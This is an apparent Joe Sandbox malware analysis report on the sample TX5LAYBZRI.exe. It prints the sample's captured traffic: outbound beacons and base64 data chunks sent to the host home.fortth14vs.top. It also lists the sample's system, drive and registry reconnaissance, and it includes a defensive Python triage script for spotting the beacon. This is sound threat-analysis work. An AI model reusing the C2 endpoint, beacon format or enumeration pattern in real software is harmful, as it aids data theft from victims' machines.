                                          Data Ascii: tN0DxB44Nx4pkMqnxFov0NpfgLwfosIg0zw5o9tGFCAfYYZn2LyF824Esu0HnBfGeetdAdNsTGsRtLUxIxZYjbQmNWb7zKhXaGPcgAnvXkZf9DHKKOCwOGr8Z5rhP7Mw0Z5dh8loU8Jgsvzul9TeCz2jCr7Svi8flLwVL+z6+b1cxrVoRpUs7q5xRw+HhS93Mf2gmeVMzx2PwPAGS4meZ42f9p4nPa9TH43Ncir4mrjMbw7jrWw
                                          Dec 31, 2024 15:47:04.443526983 CET | 1236 | OUT | Data Raw: 74 66 6f 66 58 38 2b 50 70 37 30 48 51 52 75 58 61 46 5c 2f 77 44 56 37 50 38 41 57 5c 2f 7a 36 5c 2f 77 43 66 70 6d 71 62 62 47 33 66 4a 48 73 78 35 73 58 6c 78 66 58 32 2b 76 30 78 30 71 35 38 6b 6e 38 65 7a 79 5c 2f 2b 6d 58 2b 66 30 70 6b 6e
                                          Data Ascii: tfofX8+Pp70HQRuXaF\/wDV7P8AW\/z6\/wCfpmqbbG3fJHsx5sXlxfX2+v0x0q58kn8ezy\/+mX+f0pknneXDsT54x\/pXl\/gf1zj2oNKfX5fqVhsbZv8A3fmf5+1e\/WofL83e4+RP+Wvl8wf5\/LHpk09pHZY4XSNEz5vmf\/r+tPkZFjdNnySfuv3UX7iHH8v\/AK1B006n62dt\/wCv684fLT+P\/wBG9R+NHmPlE\/eP
                                          Dec 31, 2024 15:47:06.748404980 CET | 138 | IN | HTTP/1.1 200 OK
                                          server: nginx/1.22.1
                                          date: Tue, 31 Dec 2024 14:47:06 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session ID: 1 | Source: 192.168.2.5:49707 | Destination: 34.147.147.173:80 | PID: 7088 | Process: C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 31, 2024 15:47:07.105252028 CET | 99 | OUT | GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                          Host: home.fortth14vs.top
                                          Accept: */*
                                          Dec 31, 2024 15:47:07.711004019 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                          server: nginx/1.22.1
                                          date: Tue, 31 Dec 2024 14:47:07 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 207
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          Session ID: 2 | Source: 192.168.2.5:49708 | Destination: 34.147.147.173:80 | PID: 7088 | Process: C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Dec 31, 2024 15:47:08.040447950 CET | 172 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                          Host: home.fortth14vs.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                          Data Ascii: { "id1": "0", "data": "Done1" }
                                          Dec 31, 2024 15:47:08.759886980 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                          server: nginx/1.22.1
                                          date: Tue, 31 Dec 2024 14:47:08 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 207
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          Session ID: 0 | Source: 192.168.2.5:49704 | Destination: 34.200.57.114:443 | PID: 7088 | Process: C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-31 14:47:02 UTC | 52 | OUT | GET /ip HTTP/1.1
                                          Host: httpbin.org
                                          Accept: */*
                                          2024-12-31 14:47:02 UTC | 224 | IN | HTTP/1.1 200 OK
                                          Date: Tue, 31 Dec 2024 14:47:02 GMT
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Connection: close
                                          Server: gunicorn/19.9.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: true
                                          2024-12-31 14:47:02 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                          Data Ascii: { "origin": "8.46.123.189"}
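The report's signature list flags "HTTP GET or POST without a user agent" and the three sessions above show what that looks like on the wire: an external-IP lookup at httpbin.org, a GET with `?argument=0` and a JSON `{ "id1": "0", "data": "Done1" }` POST to home.fortth14vs.top, all with only Host and Accept headers, plus the large outbound chunks at 15:47:04 whose bodies are base64 with the slash written as `\/`, i.e. base64 carried inside a JSON string. The following triage helper is an added example written for this page; it is not part of Joe Sandbox or of the analysed sample. It re-enters the request lines, headers and "Data Raw" hex exactly as the report prints them (constructed sample input taken from the records above), decodes the hex, applies the missing User-Agent check to every outbound request, collects the Host/URI pairs as IOCs and classifies each body as JSON, JSON-escaped base64 or other. The chunk fragment is only the first bytes the report prints, so it is classified, not decoded.

```python
"""Triage helper for the HTTP session records of this report (added example).

Input is constructed from the records printed above: start line plus header
lines as text, and the "Data Raw" body as space-separated hex.
"""
import json
import re
from dataclasses import dataclass


@dataclass
class HttpRecord:
    direction: str        # "OUT" = sample -> server, "IN" = server -> sample
    start_line: str       # "GET /ip HTTP/1.1" or "HTTP/1.1 404 NOT FOUND"
    headers: dict         # header names lower-cased
    body_hex: str = ""    # "Data Raw" bytes as printed, space separated

    @property
    def body(self) -> bytes:
        return bytes.fromhex(self.body_hex)


def from_report(direction: str, text: str, body_hex: str = "") -> HttpRecord:
    """Parse a 'start line + header lines' block as the report prints it."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRecord(direction, lines[0], headers, body_hex)


_B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+=*$")


def classify_body(data: bytes) -> str:
    """Return 'empty', 'json', 'json-escaped-base64', 'base64' or 'other'."""
    text = data.decode("ascii", errors="replace").strip()
    if not text:
        return "empty"
    try:
        json.loads(text)          # the "Done1" beacon and the server's "0" parse as JSON
        return "json"
    except ValueError:
        pass
    escaped = "\\/" in text       # a base64 '/' as it is escaped inside a JSON string
    if len(text) >= 16 and _B64_ALPHABET.match(text.replace("\\/", "/")):
        return "json-escaped-base64" if escaped else "base64"
    return "other"


def triage(records):
    """One finding per outbound request: IOC pair, User-Agent check, body class."""
    findings = []
    for rec in records:
        if rec.direction != "OUT":
            continue
        method, uri, _ = rec.start_line.split(" ", 2)
        findings.append({
            "method": method,
            "host": rec.headers.get("host", ""),
            "uri": uri,
            "missing_ua": "user-agent" not in rec.headers,
            "body_kind": classify_body(rec.body),
        })
    return findings


# Constructed from sessions 0, 1 and 2 printed above.
RECORDS = [
    from_report("OUT", """
        GET /ip HTTP/1.1
        Host: httpbin.org
        Accept: */*"""),
    from_report("OUT", """
        GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
        Host: home.fortth14vs.top
        Accept: */*"""),
    from_report("OUT", """
        POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
        Host: home.fortth14vs.top
        Accept: */*
        Content-Type: application/json
        Content-Length: 31""",
        "7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d"),
]

# First bytes of the 4944-byte OUT chunk at 15:47:04.347, as printed in the report.
CHUNK_HEX = ("62 66 45 44 77 46 6f 47 70 61 6e 66 7a 61 62 70 48 67 5c 2f 34 76 38 41 "
             "67 76 55 66 44 58 78 56 38 48 76 70 6d 6c 58 63 65 6e 32 38 58 68 33 78 "
             "76 62 61 58 62 65 52 47 73 64 6a 4c 62 78 4c 45 66 69 44 77 7a 72 6b 48 "
             "69 58 54 66 42 75 75 32 75 70")

FINDINGS = triage(RECORDS)

if __name__ == "__main__":
    for finding in FINDINGS:
        print(finding)
    print("chunk body:", classify_body(bytes.fromhex(CHUNK_HEX)))
```

Every outbound request in the excerpt comes back with `missing_ua` set, the hosts reduce to `httpbin.org` and `home.fortth14vs.top`, and the 15:47:04 chunk classifies as JSON-escaped base64, which is the pattern to look for in proxy logs when hunting for the same beacon: bare GET/POST without User-Agent, a JSON content type, and bodies that are base64 with `\/` sequences.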



                                          Target ID: 0
                                          Start time: 09:46:58
                                          Start date: 31/12/2024
                                          Path: C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          Wow64 process (32bit): true
                                          Commandline: "C:\Users\user\Desktop\TX5LAYBZRI.exe"
                                          Imagebase: 0xb90000
                                          File size: 4'485'632 bytes
                                          MD5 hash: 94DFCBA69551E571570208F53FAC90D6
                                          Has elevated privileges: true
                                          Has administrator privileges: true
                                          Programmed in: C, C++ or other language
                                          Reputation: low
                                          Has exited: true


                                            Execution Graph

                                            Execution Coverage: 3%
                                            Dynamic/Decrypted Code Coverage: 30.4%
                                            Signature Coverage: 9.1%
                                            Total number of Nodes: 408
                                            Total number of Limit Nodes: 47
                                            execution_graph (408 nodes; internal node numbers dropped and call chains grouped by entry point; addresses in the 0794xxxx and 0798xxxx ranges lie outside the image mapped at 00B90000, see Memory Dump Source below)
                                            • ba1139 -> ba1148 -> ba1527 -> ba0f69 -> ba0f00; ba1148 calls b9fec0 (7 API calls), ba1527 calls ba22d0 (7 API calls), ba0f69 calls bcd4d0 (6 API calls)
                                            • b9255d -> f19f70 -> b9256c GetSystemInfo -> b92589 -> b925a0 GlobalMemoryStatusEx -> b925ec -> 29 stubs (79400d7, 79400e1, 7940100, 794011a, 7940131, 794014a, 794016a, 7940196, 79401ab, 79401c4, 79401ee, 7940202, 7940222, 794023d, 7940268, 794027f, 79402b7, 79402c7, 79402de, 79402f9, 7940308, 794032b, 7940341, 794034e, 7940361, 794036f, 7940386, 79403ab, 79403d5), each reaching GetLogicalDrives (directly, or via 79402b7 -> 79402b1) and ending at 79403b5
                                            • c44720 -> c44728 -> c44733 / c4476c -> c44774 / c44878; c44728 -> c45540 (6 API calls) -> c4482e -> c49270 -> c4a440 -> c4a46b -> c4a4db -> registry walk: c4aa03 RegOpenKeyExA, c4aa27 RegQueryValueExA, c4aa85 RegQueryValueExA, c4aacc RegQueryValueExA, c4ab1e RegQueryValueExA, c4ab66 RegCloseKey, c4ab70 RegOpenKeyExA, c4ac34 RegOpenKeyExA, c4acf8 RegOpenKeyExA, c4ad56 RegEnumKeyExA, c4addf RegEnumKeyExA, c4ae16 RegOpenKeyExA, c4ae34 RegQueryValueExA, c4af43 RegQueryValueExA, c4afa0 RegQueryValueExA, c4b052 RegQueryValueExA, c4adc7 RegCloseKey; c4a46b -> c4a6c7 GetBestRoute2, c4a794 GetBestRoute2, c4a520 -> c4b830 if_indextoname; c49297 -> c4bbe0 (6 API calls); c4482e -> c44860 -> c44950 -> c44966 -> c4b590 if_indextoname, c44aa0 gethostname, c44a3e -> c4bbe0 (6 API calls); c4476c -> c430a0 (6 API calls)
                                            • b929ff FindFirstFileA -> b92a31 -> b92a5c RegOpenKeyExA -> b92a93 -> b92ade CharUpperA -> b92b0a -> b92bf9 QueryFullProcessImageNameA -> b92c3b CloseHandle -> b92c64 -> b92df1 CloseHandle -> b92e23
                                            • b93d5e -> b93d30 -> b93d90 -> b9fcb0 (7 API calls) -> b93dc1; b93d30 -> ba0ab0 -> ba05b0 -> ba05bd -> ba0707 WSAEventSelect, b976a0 -> b976e6 send, ba07ef -> ba6fa0 select, ba0847 -> ba09d0 WSAEventSelect, ba09e8 WSAEnumNetworkEvents
                                            • bc6ab0 -> bc6ad5 -> ba6fa0 -> ba7207 select; bc6bb4 / bc6b5d -> c45ed0 (9 API calls) -> c45a50 -> c45b50 / c45b88 / c45cae: c45ef0 (socket ioctlsocket setsockopt connect getsockname), c5a920 -> c5a977 send, c59320 (6 API calls), c59480 (6 API calls); c45b7a -> c470a0 -> c5a8c0 -> c5a903 recvfrom, c471c0 -> c5bc80 -> c45ef0, c473c9 -> c46050 -> c5aa30 -> c5ab96 socket -> c5abd0 ioctlsocket -> c5ad0a setsockopt -> c5ada0 connect -> c5af70 -> c5af93 getsockname; c45a99 -> c46f10 -> c5a870 -> c5a8aa recv
                                            • bc95b0 -> bc95c8 -> bca150 -> bca181 getsockname
                                            • bc8b50 -> bc8b6b -> bc8b8f -> ba6e40 select; bc8bf3 -> bca550 -> bca575 -> b975e0 -> b97607 socket, bca811 setsockopt, bcabe1 -> bc6be0 (10 API calls), bf67e0 ioctlsocket, bca150 getsockname, b978b0 closesocket; bc8bfc -> bc8c1f connect, bc8cd9 SleepEx, bc8dff -> b978b0 closesocket
                                            • b931d7 -> b931f4 -> b932dc CloseHandle
                                            • b92f17 -> b92f2c -> b92fb3 RegOpenKeyExA, b9315c RegEnumKeyExA, b931b2 RegCloseKey, b93046 RegOpenKeyExA, b93089 RegQueryValueExA, b9313b RegCloseKey
                                            • b913c9 -> b91160 -> f18a20 isxdigit
                                            • 79803aa -> 79803ba Process32FirstW -> 798040c
                                            • 105fa30 -> 105fa5a -> f212c0 -> f1e050 -> f1e09d -> f1feb6 isxdigit
                                            • bad5e0 -> bad652 WSAStartup
                                            • bce400 -> bce412 -> bc68b0 (6 API calls)
                                            • bcb400 -> b97770 -> b977b6 recv
                                            • bcb3c0 -> bcb3cb -> b976a0 send; bcb3cb -> bc9290 -> b976a0 send -> bc92e5 -> bc9335 WSAIoctl -> bc9366 -> bc9371 setsockopt
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                            • API String ID: 0-1590685507
                                            • Opcode ID: 2cdbfa19e3e6471a6a4e455fe2cb30915f09fba9c4dfd55e9882787d49caa964
                                            • Instruction ID: bbf000a328c9486db86abf30bdfff6354d5ffebf9a8920156fb94b7032acad2d
                                            • Opcode Fuzzy Hash: 2cdbfa19e3e6471a6a4e455fe2cb30915f09fba9c4dfd55e9882787d49caa964
                                            • Instruction Fuzzy Hash: D2C2BF31A043459FD724DF29C484B6AB7E2FF84314F19C6ADEC999B262D770E984CB81

                                            Control-flow Graph (basic blocks of b9255d; "call" names the call target, API names are the imports resolved inside that block; the executed/not-executed colouring of the graph is not recoverable from this listing)

                                            b9255d-b92614: call f19f70, GetSystemInfo, call 1061cf0, call 1061ee0, GlobalMemoryStatusEx, call 1061cf0, call 1061ee0 -> b92619
                                            b92619: call to one of the 29 stubs 79400d7 .. 79403d5 (79400d7, 79400e1, 7940100, 794011a, 7940131, 794014a, 794016a, 7940196, 79401ab, 79401c4, 79401ee, 7940202, 7940222, 794023d, 7940268, 794027f, 79402b7, 79402c7, 79402de, 79402f9, 7940308, 794032b, 7940341, 794034e, 7940361, 794036f, 7940386, 79403ab, 79403d5) -> b9261b-b92620
                                            b9261b-b92620 -> b92626-b92637 or b9277c-b92904
                                            b92626-b92637: call 1061af0 -> b92754-b9275c
                                            b92754-b9275c (loop head) -> b9263c-b9264f or b92762-b92777
                                            b9263c-b9264f: GetDriveTypeA -> b92655-b92685 or b92743-b92751
                                            b92655-b92685: GetDiskFreeSpaceExA -> b9268b-b9273e or b92743-b92751
                                            b9268b-b9273e: call 1061dc0, call 1061e50, call 1061ee0, call 1061be0, call 1061ee0, call 1061be0, call 1061ee0, call 1060250 -> b92743-b92751
                                            b92743-b92751: call f18b98 -> b92754-b9275c (next iteration)
                                            b92762-b92777: call 1061ee0 -> b9277c-b92904
                                            b9277c-b92904: call 1061cf0, call 1061ee0, KiUserCallbackDispatcher, call 1061cf0, call 1061ee0, call 1061cf0, call 1061ee0, call f18e38, call f18be0, call f18bd0, FindFirstFileW -> b92906-b92926 or b92928-b9292c
                                            b92906-b92926: FindNextFileW -> b92906-b92926 (loops on itself) or b92928-b9292c
                                            b92928-b9292c -> b9292e or b92932-b9296f
                                            b9292e -> b92932-b9296f
                                            b92932-b9296f: call 1061cf0, call 1061ee0, call f18e78 -> b92974-b92979
                                            b92974-b92979 -> b929a9-b929fe or b9297b-b929a4
                                            b9297b-b929a4: call 1061cf0, call 1061ee0 -> b929a9-b929fe
                                            b929a9-b929fe: call f1a2b0, call 1061cf0, call 1061ee0
                                            APIs
                                            • GetSystemInfo.KERNELBASE ref: 00B92579
                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00B925CC
                                            • GetDriveTypeA.KERNELBASE ref: 00B92647
                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00B9267E
                                            • KiUserCallbackDispatcher.NTDLL ref: 00B927E2
                                            • FindFirstFileW.KERNELBASE ref: 00B928F8
                                            • FindNextFileW.KERNELBASE ref: 00B9291F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                            • String ID: @$`
                                            • API String ID: 3271271169-3318628307
                                            • Opcode ID: 477b0317c96453aec25ce941188cafe7af70f0faeb64a40ac079ec0272127c81
                                            • Instruction ID: f33ea7197e318283369dfe06a0cf00e75fd5fa04aba4645e10e03ca9b3af7519
                                            • Opcode Fuzzy Hash: 477b0317c96453aec25ce941188cafe7af70f0faeb64a40ac079ec0272127c81
                                            • Instruction Fuzzy Hash: 14D185B49053099FCB14EFA8C98469EBBF5EF84354F0089A9E898D7344E7359A84CF52

                                            Control-flow Graph
                                            Control-flow graph (graph layout not reproduced): basic blocks b929ff-b92f16; calls FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                            • String ID: 0
                                            • API String ID: 2406880114-4108050209
                                            • Opcode ID: 435273503424bce78c3800420e84cfbb3e0f0b92402518f1d927e74f559954cd
                                            • Instruction ID: b5829b90f7ee0ffea396255683cddbe23de3f87dabbad8a1617861157830d76e
                                            • Opcode Fuzzy Hash: 435273503424bce78c3800420e84cfbb3e0f0b92402518f1d927e74f559954cd
                                            • Instruction Fuzzy Hash: 16E1D8B49053099FCB14EF68DA8469DBBF5EF44344F1088A9E888E7344EB75D985CF42

                                            Control-flow Graph
                                            Control-flow graph (graph layout not reproduced): basic blocks ba05b0-ba0a81; calls WSAEventSelect, WSAEnumNetworkEvents
                                            APIs
                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00BA0712
                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00BA09DC
                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00BA09FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: EventSelect$EnumEventsNetwork
                                            • String ID: multi.c
                                            • API String ID: 2170980988-214371023
                                            • Opcode ID: 400bd3cc6f1de9fa9972db4f64b6f628c45cb32bf4b1471b47b8532ec48f4c29
                                            • Instruction ID: 1560b26af2fd89ac62bf64d6f258332ea841ca591bc79958a1dd39c276d5ccf0
                                            • Opcode Fuzzy Hash: 400bd3cc6f1de9fa9972db4f64b6f628c45cb32bf4b1471b47b8532ec48f4c29
                                            • Instruction Fuzzy Hash: 1AD1D07161C3019FEB10EF24C881B6BB7E5FF96308F04886CF88586252E774E959CB52
                                            APIs
                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 00C5B2B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmp
